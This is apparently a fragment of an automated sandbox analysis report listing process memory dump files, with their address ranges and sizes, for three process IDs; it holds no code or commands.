-
memory/4380-16-0x00007FFBF0AF0000-0x00007FFBF15B1000-memory.dmpFilesize
10.8MB
-
memory/4380-3-0x00000263C88A0000-0x00000263C88C2000-memory.dmpFilesize
136KB
-
memory/4380-61-0x00007FFBF0AF0000-0x00007FFBF15B1000-memory.dmpFilesize
10.8MB
-
memory/4380-13-0x00007FFBF0AF0000-0x00007FFBF15B1000-memory.dmpFilesize
10.8MB
-
memory/4380-14-0x00007FFBF0AF0000-0x00007FFBF15B1000-memory.dmpFilesize
10.8MB
-
memory/4380-15-0x00007FFBF0AF0000-0x00007FFBF15B1000-memory.dmpFilesize
10.8MB
-
memory/4380-17-0x00007FFBF0AF0000-0x00007FFBF15B1000-memory.dmpFilesize
10.8MB
-
memory/4692-113-0x00007FFC0EB70000-0x00007FFC0ED65000-memory.dmpFilesize
2.0MB
-
memory/4692-116-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4692-112-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4692-109-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4692-114-0x00007FFC0D1C0000-0x00007FFC0D27E000-memory.dmpFilesize
760KB
-
memory/4692-110-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4692-108-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4692-107-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/5036-0-0x0000000000640000-0x0000000000648000-memory.dmpFilesize
32KB
-
memory/5036-1-0x00007FFBF0AF3000-0x00007FFBF0AF5000-memory.dmpFilesize
8KB